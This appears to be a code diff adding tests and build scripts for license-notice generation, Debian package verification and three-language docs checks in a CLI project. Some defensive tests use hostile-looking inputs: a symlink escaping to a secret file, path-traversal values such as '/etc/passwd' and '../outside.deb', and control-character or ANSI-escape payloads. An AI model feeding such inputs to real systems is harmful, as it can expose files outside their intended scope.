+ *     a truncated or sanitized license is no longer the license;
+ *   - the code fence adapts to backtick runs in the content (aws-lc-sys's
+ *     LICENSE really does contain a ``` run, which a fixed fence would break);
+ *   - the committed THIRD-PARTY-LICENSES.md actually carries the Apache-2.0
+ *     text and an appendix section for every top-level-AND row in its table.
+ */
+
+import { describe, it, expect, beforeEach, afterEach } from "vitest";
+import { mkdtempSync, rmSync, writeFileSync, symlinkSync, mkdirSync, readFileSync } from "node:fs";
+import { tmpdir } from "node:os";
+import { join } from "node:path";
+import {
+  normalizeSpdx,
+  parseSpdx,
+  hasNonElectableObligation,
+  discoverNoticeFiles,
+  normalizeNoticeText,
+  renderNoticeAppendix,
+  fenceFor,
+} from "../../../scripts/generate-third-party-licenses";
+
+// Repo root: packages/npm/test -> ../../..
+const REPO_ROOT = join(__dirname, "..", "..", "..");
+
+describe("normalizeSpdx", () => {
+  it("rewrites the legacy slash shorthand as an OR choice", () => {
+    expect(normalizeSpdx("MIT/Apache-2.0")).toBe("MIT OR Apache-2.0");
+  });
+
+  it("collapses redundant whitespace", () => {
+    expect(normalizeSpdx("  MIT   OR   Apache-2.0 ")).toBe("MIT OR Apache-2.0");
+  });
+
+  it("leaves a modern expression unchanged", () => {
+    expect(normalizeSpdx("ISC AND (Apache-2.0 OR ISC)")).toBe("ISC AND (Apache-2.0 OR ISC)");
+  });
+});
+
+describe("parseSpdx", () => {
+  it("parses a bare license as an atom", () => {
+    expect(parseSpdx("MIT")).toEqual({ kind: "license", id: "MIT" });
+  });
+
+  it("binds AND tighter than OR", () => {
+    // `A OR B AND C` must be A OR (B AND C), so the root is a disjunction.
+    const node = parseSpdx("MIT OR Apache-2.0 AND ISC");
+    expect(node.kind).toBe("or");
+  });
+
+  it("treats a WITH exception as a single atom", () => {
+    expect(parseSpdx("Apache-2.0 WITH LLVM-exception")).toEqual({
+      kind: "license",
+      id: "Apache-2.0 WITH LLVM-exception",
+    });
+  });
+
+  it("respects parentheses over natural precedence", () => {
+    const node = parseSpdx("(MIT OR Apache-2.0) AND Unicode-3.0");
+    expect(node.kind).toBe("and");
+  });
+
+  it("parses nested parentheses", () => {
+    const node = parseSpdx("A AND (B OR (C AND D))");
+    expect(node).toEqual({
+      kind: "and",
+      operands: [
+        { kind: "license", id: "A" },
+        {
+          kind: "or",
+          operands: [
+            { kind: "license", id: "B" },
+            {
+              kind: "and",
+              operands: [
+                { kind: "license", id: "C" },
+                { kind: "license", id: "D" },
+              ],
+            },
+          ],
+        },
+      ],
+    });
+  });
+
+  it("rejects an unbalanced parenthesis", () => {
+    expect(() => parseSpdx("(MIT OR Apache-2.0")).toThrowError(/unbalanced/);
+  });
+});
+
+describe("hasNonElectableObligation", () => {
+  it("returns false for a plain OR choice", () => {
+    expect(hasNonElectableObligation("MIT OR Apache-2.0")).toBe(false);
+  });
+
+  it("returns false for the legacy slash shorthand", () => {
+    expect(hasNonElectableObligation("Unlicense/MIT")).toBe(false);
+  });
+
+  it("returns false for a single license", () => {
+    expect(hasNonElectableObligation("MIT")).toBe(false);
+  });
+
+  it("returns true for aws-lc-rs's conjunction", () => {
+    expect(hasNonElectableObligation("ISC AND (Apache-2.0 OR ISC)")).toBe(true);
+  });
+
+  it("returns true for aws-lc-sys's full expression", () => {
+    const expr =
+      "ISC AND (Apache-2.0 OR ISC) AND Apache-2.0 AND MIT AND BSD-3-Clause AND " +
+      "(Apache-2.0 OR ISC OR MIT) AND (Apache-2.0 OR ISC OR MIT-0)";
+    expect(hasNonElectableObligation(expr)).toBe(true);
+  });
+
+  it("returns true for ring's conjunction", () => {
+    expect(hasNonElectableObligation("Apache-2.0 AND ISC")).toBe(true);
+  });
+
+  it("returns true for unicode-ident's parenthesized OR conjoined with Unicode-3.0", () => {
+    expect(hasNonElectableObligation("(MIT OR Apache-2.0) AND Unicode-3.0")).toBe(true);
+  });
+
+  it("returns false when an AND is nested under a top-level OR (the OR is still electable)", () => {
+    expect(hasNonElectableObligation("MIT OR (Apache-2.0 AND ISC)")).toBe(false);
+  });
+
+  it("handles a WITH exception inside a conjunction", () => {
+    expect(hasNonElectableObligation("Apache-2.0 WITH LLVM-exception AND MIT")).toBe(true);
+  });
+});
+
+describe("discoverNoticeFiles", () => {
+  let crateDir: string;
+
+  beforeEach(() => {
+    crateDir = mkdtempSync(join(tmpdir(), "vibe-notice-"));
+  });
+
+  afterEach(() => {
+    rmSync(crateDir, { recursive: true, force: true });
+  });
+
+  it("lists matching root files sorted by name", async () => {
+    writeFileSync(join(crateDir, "LICENSE-MIT"), "mit");
+    writeFileSync(join(crateDir, "LICENSE-APACHE"), "apache");
+    writeFileSync(join(crateDir, "NOTICE"), "notice");
+    writeFileSync(join(crateDir, "COPYING"), "copying");
+
+    expect(await discoverNoticeFiles(crateDir)).toEqual([
+      "COPYING",
+      "LICENSE-APACHE",
+      "LICENSE-MIT",
+      "NOTICE",
+    ]);
+  });
+
+  it("ignores files that are not license notices", async () => {
+    writeFileSync(join(crateDir, "LICENSE"), "terms");
+    writeFileSync(join(crateDir, "Cargo.toml"), "[package]");
+    writeFileSync(join(crateDir, "README.md"), "# readme");
+
+    expect(await discoverNoticeFiles(crateDir)).toEqual(["LICENSE"]);
+  });
+
+  it("excludes a symlink rather than following it out of the crate", async () => {
+    // A crate that points LICENSE at a file elsewhere on the machine would
+    // otherwise have that file's contents inlined into a published document.
+    const outside = mkdtempSync(join(tmpdir(), "vibe-outside-"));
+    const secret = join(outside, "secret");
+    writeFileSync(secret, "SECRET");
+    writeFileSync(join(crateDir, "LICENSE"), "real terms");
+    symlinkSync(secret, join(crateDir, "LICENSE-EVIL"));
+
+    expect(await discoverNoticeFiles(crateDir)).toEqual(["LICENSE"]);
+    rmSync(outside, { recursive: true, force: true });
+  });
+
+  it("excludes a directory that matches the notice name pattern", async () => {
+    mkdirSync(join(crateDir, "LICENSES"));
+    writeFileSync(join(crateDir, "LICENSE"), "terms");
+
+    expect(await discoverNoticeFiles(crateDir)).toEqual(["LICENSE"]);
+  });
+
+  it("returns nothing for a crate that ships no notices", async () => {
+    writeFileSync(join(crateDir, "Cargo.toml"), "[package]");
+    expect(await discoverNoticeFiles(crateDir)).toEqual([]);
+  });
+});
+
+describe("normalizeNoticeText", () => {
+  it("converts CRLF to LF", () => {
+    expect(normalizeNoticeText(Buffer.from("a\r\nb\r\n"), "x/LICENSE")).toBe("a\nb\n");
+  });
+
+  it("strips a leading BOM", () => {
+    expect(normalizeNoticeText(Buffer.from("\ufeffMIT License\n"), "x/LICENSE")).toBe(
+      "MIT License\n",
+    );
+  });
+
+  it("collapses trailing newlines to exactly one", () => {
+    expect(normalizeNoticeText(Buffer.from("terms\n\n\n"), "x/LICENSE")).toBe("terms\n");
+  });
+
+  it("appends a trailing newline when the file lacks one", () => {
+    expect(normalizeNoticeText(Buffer.from("terms"), "x/LICENSE")).toBe("terms\n");
+  });
+
+  it("preserves tabs and interior blank lines", () => {
+    expect(normalizeNoticeText(Buffer.from("a\n\n\tb\n"), "x/LICENSE")).toBe("a\n\n\tb\n");
+  });
+
+  it("rejects a file over the 1 MiB limit instead of truncating it", () => {
+    const oversized = Buffer.alloc(1024 * 1024 + 1, 0x41);
+    expect(() => normalizeNoticeText(oversized, "big/LICENSE")).toThrowError(/over the/);
+  });
+
+  it("accepts a file exactly at the limit", () => {
+    const exact = Buffer.alloc(1024 * 1024, 0x41);
+    expect(normalizeNoticeText(exact, "big/LICENSE")).toHaveLength(1024 * 1024 + 1);
+  });
+
+  it("rejects invalid UTF-8", () => {
+    expect(() => normalizeNoticeText(Buffer.from([0xff, 0xfe, 0x00]), "bad/LICENSE")).toThrowError(
+      /not valid UTF-8/,
+    );
+  });
+
+  it("rejects control characters rather than sanitizing them", () => {
+    expect(() => normalizeNoticeText(Buffer.from("a\u0007b"), "bad/LICENSE")).toThrowError(
+      /control characters/,
+    );
+  });
+
+  it("rejects an ANSI escape sequence", () => {
+    expect(() => normalizeNoticeText(Buffer.from("\u001b[31mred"), "bad/LICENSE")).toThrowError(
+      /control characters/,
+    );
+  });
+
+  it("names the crate and file but never echoes the content", () => {
+    const attempt = () => normalizeNoticeText(Buffer.from("secret\u0007payload"), "evil/LICENSE");
+    expect(attempt).toThrowError(/evil\/LICENSE/);
+    expect(attempt).not.toThrowError(/secret/);
+  });
+});
+
+describe("fenceFor", () => {
+  it("uses three backticks for content with none", () => {
+    expect(fenceFor("plain text\n")).toBe("```");
+  });
+
+  it("outgrows the longest backtick run in the content", () => {
+    expect(fenceFor("see ``` fenced\n")).toBe("````");
+    expect(fenceFor("see ````` fenced\n")).toBe("``````");
+  });
+
+  it("counts a run that appears mid-line, not only at line start", () => {
+    expect(fenceFor("prefix ```` suffix\n")).toBe("`````");
+  });
+});
+
+describe("renderNoticeAppendix", () => {
+  it("renders a heading per crate and per file", () => {
+    const out = renderNoticeAppendix([
+      {
+        name: "demo",
+        version: "1.0.0",
+        license: "Apache-2.0 AND ISC",
+        files: [
+          { name: "LICENSE", text: "terms\n" },
+          { name: "NOTICE", text: "notice\n" },
+        ],
+      },
+    ]);
+
+    expect(out).toContain("## Appendix: License texts and notices for non-electable obligations");
+    expect(out).toContain("### demo 1.0.0 — Apache-2.0 AND ISC");
+    expect(out).toContain("#### LICENSE");
+    expect(out).toContain("#### NOTICE");
+  });
+
+  it("widens the fence when a notice itself contains a triple backtick", () => {
+    // aws-lc-sys's real LICENSE contains a ``` run; a fixed three-backtick
+    // fence would end the block early and corrupt the reproduced text.
+    const out = renderNoticeAppendix([
+      {
+        name: "fencey",
+        version: "0.1.0",
+        license: "Apache-2.0 AND ISC",
+        files: [{ name: "LICENSE", text: "before\n```\ninside\n```\nafter\n" }],
+      },
+    ]);
+
+    expect(out).toContain("````\nbefore\n```\ninside\n```\nafter\n````");
+  });
+
+  it("keeps the crate order it is given", () => {
+    const out = renderNoticeAppendix([
+      { name: "alpha", version: "1.0.0", license: "A AND B", files: [{ name: "L", text: "a\n" }] },
+      { name: "beta", version: "2.0.0", license: "A AND B", files: [{ name: "L", text: "b\n" }] },
+    ]);
+    expect(out.indexOf("### alpha")).toBeLessThan(out.indexOf("### beta"));
+  });
+});
+
+describe("committed THIRD-PARTY-LICENSES.md", () => {
+  const doc = readFileSync(join(REPO_ROOT, "THIRD-PARTY-LICENSES.md"), "utf-8");
+
+  it("reproduces the Apache-2.0 body in full", () => {
+    // Both ends of the license, so a truncated reproduction fails too.
+    expect(doc).toContain("TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION");
+    expect(doc).toContain("END OF TERMS AND CONDITIONS");
+  });
+
+  it("carries the appendix section", () => {
+    expect(doc).toContain("## Appendix: License texts and notices for non-electable obligations");
+  });
+
+  it("has an appendix heading for every top-level-AND row in the crate table", () => {
+    // Drives off the committed table rather than a hardcoded crate list, so a
+    // newly added AND-licensed dependency without a reproduced notice fails.
+    const rows = [...doc.matchAll(/^\| (\S+) \| (\S+) \| (.+?) \|$/gm)]
+      .filter(([, name]) => name !== "Crate" && !name.startsWith("-"))
+      .map(([, name, version, license]) => ({ name, version, license }));
+    expect(rows.length).toBeGreaterThan(0);
+
+    const obligated = rows.filter((r) => hasNonElectableObligation(r.license));
+    expect(obligated.length).toBeGreaterThan(0);
+
+    const missing = obligated
+      .filter((r) => !doc.includes(`### ${r.name} ${r.version} — ${r.license}`))
+      .map((r) => `${r.name} ${r.version}`);
+    expect(missing).toEqual([]);
+  });
+});

--- a/packages/npm/test/verify-deb.test.ts
+++ b/packages/npm/test/verify-deb.test.ts
@@ -1,0 +1,199 @@
+/**
+ * Tests for scripts/verify-deb.ts — asserts that a built .deb ships the binary
+ * and the documentation Debian expects: usr/bin/vibe (a regular, executable
+ * file), the DEP-5 usr/share/doc/vibe/copyright, and THIRD-PARTY-LICENSES.md
+ * for the statically-linked Rust crates. None of these is visible from a smoke
+ * test of the installed binary, so a package that drops them would otherwise
+ * ship silently.
+ *
+ * Only the pure parsing/validation is unit-tested here; the `dpkg-deb`
+ * invocation that feeds it is exercised by the CI build-deb steps (it needs a
+ * real archive, and dpkg-deb does not exist on macOS dev machines).
+ */
+
+import { describe, it, expect } from "vitest";
+import {
+  parseDebContents,
+  isRegularFile,
+  isExecutable,
+  findContentProblems,
+  findMarkerProblems,
+  resolveDebPath,
+} from "../../../scripts/verify-deb";
+
+/** A well-formed `dpkg-deb --contents` listing for a correct package. */
+const GOOD_CONTENTS = `drwxr-xr-x root/root         0 2025-01-01 00:00 ./
+drwxr-xr-x root/root         0 2025-01-01 00:00 ./usr/
+drwxr-xr-x root/root         0 2025-01-01 00:00 ./usr/bin/
+-rwxr-xr-x root/root   5242880 2025-01-01 00:00 ./usr/bin/vibe
+drwxr-xr-x root/root         0 2025-01-01 00:00 ./usr/share/doc/vibe/
+-rw-r--r-- root/root      1234 2025-01-01 00:00 ./usr/share/doc/vibe/copyright
+-rw-r--r-- root/root    999999 2025-01-01 00:00 ./usr/share/doc/vibe/THIRD-PARTY-LICENSES.md
+`;
+
+function entriesOf(contents: string) {
+  return parseDebContents(contents);
+}
+
+describe("parseDebContents", () => {
+  it("extracts every member with its mode, stripping the leading ./", () => {
+    const entries = entriesOf(GOOD_CONTENTS);
+    expect(entries).toHaveLength(7);
+    expect(entries).toContainEqual({ path: "usr/bin/vibe", mode: "-rwxr-xr-x" });
+    expect(entries).toContainEqual({
+      path: "usr/share/doc/vibe/copyright",
+      mode: "-rw-r--r--",
+    });
+  });
+
+  it("keeps a path that contains spaces intact", () => {
+    // Taking the last whitespace-separated field would truncate this to "name"
+    // and report the real member as missing.
+    const entries = entriesOf(
+      "-rw-r--r-- root/root  10 2025-01-01 00:00 ./usr/share/doc/vibe/a file with name\n",
+    );
+    expect(entries).toEqual([
+      { path: "usr/share/doc/vibe/a file with name", mode: "-rw-r--r--" },
+    ]);
+  });
+
+  it("records a symlink under its own name, not its target", () => {
+    const entries = entriesOf(
+      "lrwxrwxrwx root/root  0 2025-01-01 00:00 ./usr/share/doc/vibe/copyright -> ../shared/copyright\n",
+    );
+    expect(entries).toEqual([
+      { path: "usr/share/doc/vibe/copyright", mode: "lrwxrwxrwx" },
+    ]);
+  });
+
+  it("ignores blank lines and lines with too few fields", () => {
+    expect(entriesOf("\n   \ngarbage\n")).toEqual([]);
+  });
+});
+
+describe("isRegularFile", () => {
+  it("accepts a regular file and rejects directories and symlinks", () => {
+    expect(isRegularFile("-rw-r--r--")).toBe(true);
+    expect(isRegularFile("drwxr-xr-x")).toBe(false);
+    expect(isRegularFile("lrwxrwxrwx")).toBe(false);
+  });
+});
+
+describe("isExecutable", () => {
+  it("detects an execute bit in the permission triples", () => {
+    expect(isExecutable("-rwxr-xr-x")).toBe(true);
+    expect(isExecutable("-rw-r--r--")).toBe(false);
+  });
+
+  it("ignores the file-type character so a directory is not 'executable' by its d", () => {
+    // Why this matters: the type char is not a permission bit, and reading it as
+    // one made every directory look like an executable file.
+    expect(isExecutable("drw-r--r--")).toBe(false);
+  });
+});
+
+describe("findContentProblems", () => {
+  it("reports no problems for a complete, correct package", () => {
+    expect(findContentProblems(entriesOf(GOOD_CONTENTS))).toEqual([]);
+  });
+
+  it("reports a missing copyright file", () => {
+    const entries = entriesOf(GOOD_CONTENTS).filter((e) => !e.path.endsWith("/copyright"));
+    expect(findContentProblems(entries)).toEqual([
+      "missing required file: usr/share/doc/vibe/copyright",
+    ]);
+  });
+
+  it("reports a missing THIRD-PARTY-LICENSES.md", () => {
+    const entries = entriesOf(GOOD_CONTENTS).filter(
+      (e) => !e.path.endsWith("THIRD-PARTY-LICENSES.md"),
+    );
+    expect(findContentProblems(entries)).toEqual([
+      "missing required file: usr/share/doc/vibe/THIRD-PARTY-LICENSES.md",
+    ]);
+  });
+
+  it("reports a missing binary", () => {
+    const entries = entriesOf(GOOD_CONTENTS).filter((e) => e.path !== "usr/bin/vibe");
+    expect(findContentProblems(entries)).toEqual(["missing required file: usr/bin/vibe"]);
+  });
+
+  it("reports a binary that carries no execute bit", () => {
+    const entries = entriesOf(GOOD_CONTENTS).map((e) =>
+      e.path === "usr/bin/vibe" ? { ...e, mode: "-rw-r--r--" } : e,
+    );
+    expect(findContentProblems(entries)).toEqual([
+      "usr/bin/vibe is not executable (mode -rw-r--r--)",
+    ]);
+  });
+
+  it("rejects a directory occupying the binary's path", () => {
+    // A bare presence check would accept this and call the package valid.
+    const entries = entriesOf(GOOD_CONTENTS).map((e) =>
+      e.path === "usr/bin/vibe" ? { ...e, mode: "drwxr-xr-x" } : e,
+    );
+    expect(findContentProblems(entries)).toEqual([
+      "usr/bin/vibe is not a regular file (mode drwxr-xr-x)",
+    ]);
+  });
+
+  it("rejects a copyright symlink (its target need not ship in the package)", () => {
+    const entries = entriesOf(GOOD_CONTENTS).map((e) =>
+      e.path.endsWith("/copyright") ? { ...e, mode: "lrwxrwxrwx" } : e,
+    );
+    expect(findContentProblems(entries)).toEqual([
+      "usr/share/doc/vibe/copyright is not a regular file (mode lrwxrwxrwx)",
+    ]);
+  });
+
+  it("reports every problem at once rather than stopping at the first", () => {
+    expect(findContentProblems([])).toHaveLength(3);
+  });
+});
+
+describe("findMarkerProblems", () => {
+  it("returns nothing when every marker is present", () => {
+    expect(findMarkerProblems("copyright", "Format: x\nLicense: MIT\n", ["Format: x", "License: MIT"]))
+      .toEqual([]);
+  });
+
+  it("names each absent marker", () => {
+    expect(findMarkerProblems("copyright", "License: MIT", ["Format: x", "License: MIT"])).toEqual([
+      "copyright does not contain: Format: x",
+    ]);
+  });
+});
+
+describe("resolveDebPath", () => {
+  const cwd = "/work";
+
+  it("resolves a relative path inside the working directory", () => {
+    expect(resolveDebPath("vibe_1.0.0_amd64.deb", cwd)).toBe("/work/vibe_1.0.0_amd64.deb");
+  });
+
+  it("allows a nested path under the working directory", () => {
+    expect(resolveDebPath("dist/vibe_1.0.0_amd64.deb", cwd)).toBe("/work/dist/vibe_1.0.0_amd64.deb");
+  });
+
+  it("rejects an absolute path outside the working directory", () => {
+    expect(() => resolveDebPath("/etc/passwd", cwd)).toThrowError(/inside the working directory/);
+  });
+
+  it("rejects a parent-directory escape", () => {
+    expect(() => resolveDebPath("../outside.deb", cwd)).toThrowError(
+      /inside the working directory/,
+    );
+  });
+
+  it("rejects an escape hidden mid-path", () => {
+    expect(() => resolveDebPath("dist/../../outside.deb", cwd)).toThrowError(
+      /inside the working directory/,
+    );
+  });
+
+  it("rejects the working directory itself (empty and '.')", () => {
+    // Neither names a .deb file; accepting them would hand a directory to dpkg.
+    expect(() => resolveDebPath("", cwd)).toThrowError(/inside the working directory/);
+    expect(() => resolveDebPath(".", cwd)).toThrowError(/inside the working directory/);
+  });
+});

--- a/scripts/build-deb.ts
+++ b/scripts/build-deb.ts
@@ -1,16 +1,33 @@
+#!/usr/bin/env bun
+
 /**
  * Build .deb packages for Ubuntu/Debian
  * Usage: bun run scripts/build-deb.ts <version> <arch> <binary-path>
  * Example: bun run scripts/build-deb.ts 0.1.5 amd64 vibe-linux-x64
+ *
+ * Besides /usr/bin/vibe the package installs the documentation Debian expects a
+ * binary package to carry: a machine-readable DEP-5 copyright file derived from
+ * the repo's own LICENSE, and THIRD-PARTY-LICENSES.md for the Rust crates the
+ * binary statically links.
  */
 
-import { mkdir, copyFile, writeFile, chmod, rm, stat } from "node:fs/promises";
+import { mkdir, copyFile, writeFile, chmod, rm, stat, readFile } from "node:fs/promises";
 import { spawn } from "node:child_process";
+import { join } from "node:path";
+
+const DOC_DIR = "usr/share/doc/vibe";
+const THIRD_PARTY_LICENSE_FILE = "THIRD-PARTY-LICENSES.md";
+const PROJECT_LICENSE_FILE = "LICENSE";
 
 interface DebConfig {
   version: string;
   arch: string; // amd64 or arm64
   binaryPath: string;
+}
+
+export interface BuildOptions {
+  /** Repo root that LICENSE and THIRD-PARTY-LICENSES.md resolve under. */
+  root?: string;
 }
 
 async function runCommand(cmd: string, args: string[]): Promise<{ success: boolean }> {
@@ -19,13 +36,145 @@ async function runCommand(cmd: string, args: string[]): Promise<{ success: boole
       stdio: "inherit",
     });
 
+    // Why handle "error" and not only "close": a spawn failure (dpkg-deb absent
+    // from PATH) emits "error" and never "close", so without this the promise
+    // never settles and the build hangs instead of reporting a missing tool.
+    proc.on("error", (err: Error) => {
+      console.error(`${cmd}: ${err.message}`);
+      resolve({ success: false });
+    });
+
     proc.on("close", (code) => {
       resolve({ success: code === 0 });
     });
   });
 }
 
-async function createDebPackage(config: DebConfig): Promise<void> {
+/**
+ * Reformat a license body as a DEP-5 formatted-text field value: blank lines
+ * become ` .` and every other line is indented by one space, so the whole block
+ * is a single continued field.
+ *
+ * Throws on a non-blank line that already starts with `.`: DEP-5 reads ` .` as
+ * an escaped empty line, so such a line would silently come back out of the
+ * file as a blank one, corrupting the reproduced license text.
+ */
+export function formatDep5Text(text: string): string {
+  return text
+    .replace(/\r\n/g, "\n")
+    .replace(/\n+$/, "")
+    .split("\n")
+    .map((line) => {
+      const isBlank = line.trim() === "";
+      if (isBlank) {
+        return " .";
+      }
+      if (line.startsWith(".")) {
+        throw new Error(
+          "license text has a line starting with '.', which DEP-5 continuation syntax cannot represent",
+        );
+      }
+      return ` ${line}`;
+    })
+    .join("\n");
+}
+
+/**
+ * Pull the upstream copyright holder line out of the license text.
+ * Throws rather than defaulting: a wrong or invented holder in a legal document
+ * is worse than a failed build.
+ */
+export function extractCopyrightLine(licenseText: string): string {
+  const match = licenseText.match(/^\s*(Copyright \(c\).*)$/m);
+  if (!match) {
+    throw new Error(`no "Copyright (c)" line found in ${PROJECT_LICENSE_FILE}`);
+  }
+  return match[1].trim();
+}
+
+export interface CopyrightOptions {
+  /** The project's own LICENSE text (MIT), used verbatim for the License stanza. */
+  licenseText: string;
+}
+
+/**
+ * Render `usr/share/doc/vibe/copyright` in machine-readable DEP-5 1.0 format.
+ * The MIT body is derived from the repo LICENSE rather than hardcoded, so the
+ * .deb can never state terms that differ from the ones actually shipped.
+ */
+export function renderDebianCopyright({ licenseText }: CopyrightOptions): string {
+  const copyright = extractCopyrightLine(licenseText);
+  const body = formatDep5Text(licenseText);
+
+  return `Format: https://www.debian.org/doc/packaging-manuals/copyright-format/1.0/
+Upstream-Name: vibe
+Upstream-Contact: kexi <https://github.com/kexi>
+Source: https://github.com/kexi/vibe
+
+Files: *
+Copyright: ${copyright}
+License: MIT
+Comment: The vibe binary statically links third-party Rust crates.
+ Their license notices are installed alongside this file as
+ /usr/share/doc/vibe/${THIRD_PARTY_LICENSE_FILE}.
+
+License: MIT
+${body}
+`;
+}
+
+async function readRequired(path: string, what: string): Promise<string> {
+  const exists = await stat(path).then(
+    (s) => s.isFile(),
+    () => false,
+  );
+  if (!exists) {
+    throw new Error(`${what} not found: ${path}`);
+  }
+  return readFile(path, "utf-8");
+}
+
+/**
+ * Populate `<packageDir>/usr/share/doc/vibe/` with the DEP-5 copyright file and
+ * THIRD-PARTY-LICENSES.md, with modes set explicitly (0755 dir, 0644 files) so
+ * the caller's umask cannot produce an unreadable installed document.
+ *
+ * Both sources are required. Why not warn on a missing THIRD-PARTY-LICENSES.md
+ * the way stage-platform-package.ts does: there the file is a build product a
+ * developer may not have generated yet, and the tarball verifier is the release
+ * gate. Here it is a committed file, so its absence means a broken checkout —
+ * and unlike an npm tarball, a .deb that installs no notices is a distribution
+ * that silently drops the crates' terms.
+ *
+ * The files are installed uncompressed: `dpkg-deb` does not gzip them, and
+ * `copyright` must stay plain text for the archive tooling that reads it.
+ */
+export async function stageDocFiles(packageDir: string, options: BuildOptions = {}): Promise<void> {
+  const root = options.root ?? ".";
+
+  const licenseText = await readRequired(join(root, PROJECT_LICENSE_FILE), PROJECT_LICENSE_FILE);
+  const notices = await readRequired(
+    join(root, THIRD_PARTY_LICENSE_FILE),
+    THIRD_PARTY_LICENSE_FILE,
+  );
+
+  const docDir = join(packageDir, DOC_DIR);
+  await mkdir(docDir, { recursive: true });
+  await chmod(docDir, 0o755);
+
+  const copyrightPath = join(docDir, "copyright");
+  await writeFile(copyrightPath, renderDebianCopyright({ licenseText }), "utf-8");
+  await chmod(copyrightPath, 0o644);
+
+  const noticesPath = join(docDir, THIRD_PARTY_LICENSE_FILE);
+  await writeFile(noticesPath, notices, "utf-8");
+  await chmod(noticesPath, 0o644);
+}
+
+export async function createDebPackage(
+  config: DebConfig,
+  options: BuildOptions = {},
+): Promise<void> {
   const { version, arch, binaryPath } = config;
   const packageName = `vibe_${version}_${arch}`;
   const packageDir = packageName;
@@ -41,7 +190,11 @@ async function createDebPackage(config: DebConfig): Promise<void> {
     // Set executable permissions
     await chmod(`${packageDir}/usr/bin/vibe`, 0o755);
 
-    // Create control file
+    await stageDocFiles(packageDir, options);
+
+    // Create control file. Why no License: field: the Debian binary package
+    // control format has none — the terms live in usr/share/doc/vibe/copyright,
+    // and an unknown field would make the package fail lintian/policy checks.
     const controlContent = `Package: vibe
 Version: ${version}
 Architecture: ${arch}
@@ -108,4 +261,11 @@ async function main(): Promise<void> {
   await createDebPackage({ version, arch, binaryPath });
 }
 
-main();
+// Only run the CLI when executed directly (bun sets import.meta.main); under
+// vitest import.meta.main is undefined, so importing for tests is side-effect free.
+if (import.meta.main) {
+  main().catch((err: unknown) => {
+    console.error(`build-deb: ${err instanceof Error ? err.message : String(err)}`);
+    process.exit(1);
+  });
+}

--- a/scripts/check-markdown-i18n.ts
+++ b/scripts/check-markdown-i18n.ts
@@ -1,0 +1,329 @@
+#!/usr/bin/env bun
+
+/**
+ * Enforce the three-language (en / ja / zh) documentation invariants that
+ * `.claude/rules/markdown.md` and `.claude/rules/docs-i18n.md` describe in prose.
+ *
+ * Two independent corpora, two different shapes of the same rule:
+ *
+ *   1. Repository markdown (README.md, docs/**) uses a filename suffix:
+ *      `x.md` / `x.ja.md` / `x.zh.md`. Membership is DERIVED — a document is in
+ *      scope only once at least one translation of it exists on disk. That is
+ *      why CONTRIBUTING.md, AGENTS.md, CLAUDE.md and packages/npm/README.md
+ *      need no exclusion list: having no `.ja.md`/`.zh.md` sibling, they are
+ *      untranslated documents, not violations. A hardcoded allowlist would have
+ *      to be edited every time a doc is added and would silently rot.
+ *
+ *   2. The docs site (packages/docs/src/content/docs) uses Starlight's
+ *      directory-per-locale layout: the English page set at the root (minus the
+ *      locale dirs) must equal the `ja/` set and the `zh/` set, exactly.
+ *
+ * Cross-language links are checked structurally rather than byte-exactly: the
+ * repo deliberately carries three stylings of the same header line (a bare
+ * `[日本語](README.ja.md)`, a `> 🇯🇵 [日本語版](./x.ja.md)` blockquote, and a
+ * `> [!NOTE]` callout with GitHub `:jp:`/`:us:`/`:cn:` shortcodes). Pinning the
+ * exact bytes would force a churny rewrite of files whose content this change
+ * must not touch, so the assertion is the one that actually matters: within the
+ * first few lines, each file links to the other two languages.
+ *
+ * Usage:
+ *   bun run scripts/check-markdown-i18n.ts
+ */
+
+import { readdirSync, readFileSync, statSync } from "node:fs";
+import { join, relative, sep } from "node:path";
+
+/** Locale suffixes for repository markdown, in report order. */
+export const MARKDOWN_LOCALES = ["ja", "zh"] as const;
+
+/** Locale directories under the docs content root, in report order. */
+export const DOCS_LOCALE_DIRS = ["ja", "zh"] as const;
+
+/** Directories never walked when collecting repository markdown. */
+const IGNORED_DIRS = new Set([
+  "node_modules",
+  ".git",
+  "dist",
+  "target",
+  "build",
+  ".astro",
+  "coverage",
+  ".next",
+  "result",
+]);
+
+/** How many leading lines may contain the cross-language link header. */
+export const LINK_HEADER_LINES = 5;
+
+/** Repository markdown paths, relative to the repo root, using `/` separators. */
+export function collectMarkdownFiles(root: string): string[] {
+  const found: string[] = [];
+
+  const walk = (dir: string): void => {
+    for (const entry of readdirSync(dir, { withFileTypes: true })) {
+      const isIgnored = entry.isDirectory() && IGNORED_DIRS.has(entry.name);
+      if (isIgnored) continue;
+
+      const full = join(dir, entry.name);
+      if (entry.isDirectory()) {
+        walk(full);
+        continue;
+      }
+      const isMarkdown = entry.isFile() && entry.name.endsWith(".md");
+      if (!isMarkdown) continue;
+
+      found.push(toPosix(relative(root, full)));
+    }
+  };
+
+  walk(root);
+  return found.sort();
+}
+
+function toPosix(p: string): string {
+  return sep === "/" ? p : p.split(sep).join("/");
+}
+
+/**
+ * The base name of a markdown path with its locale suffix stripped, or null
+ * when the path is not markdown. `docs/x.ja.md` and `docs/x.md` both yield
+ * `docs/x`, which is what groups a translation triplet together.
+ */
+export function markdownBase(path: string): string | null {
+  if (!path.endsWith(".md")) return null;
+  for (const locale of MARKDOWN_LOCALES) {
+    const suffix = `.${locale}.md`;
+    if (path.endsWith(suffix)) return path.slice(0, -suffix.length);
+  }
+  return path.slice(0, -".md".length);
+}
+
+/** The locale of a markdown path: one of MARKDOWN_LOCALES, or "en" for the base file. */
+export function markdownLocale(path: string): string {
+  for (const locale of MARKDOWN_LOCALES) {
+    if (path.endsWith(`.${locale}.md`)) return locale;
+  }
+  return "en";
+}
+
+export interface TripletProblem {
+  /** Base path without locale suffix, e.g. `docs/architecture`. */
+  base: string;
+  /** Files that must exist but do not, e.g. `docs/architecture.zh.md`. */
+  missing: string[];
+}
+
+/**
+ * Groups markdown files by base name and reports every group that has at least
+ * one translation but is not a complete en/ja/zh triplet. Groups consisting of
+ * only the base `.md` are untranslated and intentionally not reported.
+ */
+export function findIncompleteTriplets(files: string[]): TripletProblem[] {
+  const groups = new Map<string, Set<string>>();
+
+  for (const file of files) {
+    const base = markdownBase(file);
+    if (base === null) continue;
+    const locales = groups.get(base) ?? new Set<string>();
+    locales.add(markdownLocale(file));
+    groups.set(base, locales);
+  }
+
+  const problems: TripletProblem[] = [];
+  for (const [base, locales] of [...groups].sort(([a], [b]) => (a < b ? -1 : 1))) {
+    const isUntranslated = locales.size === 1 && locales.has("en");
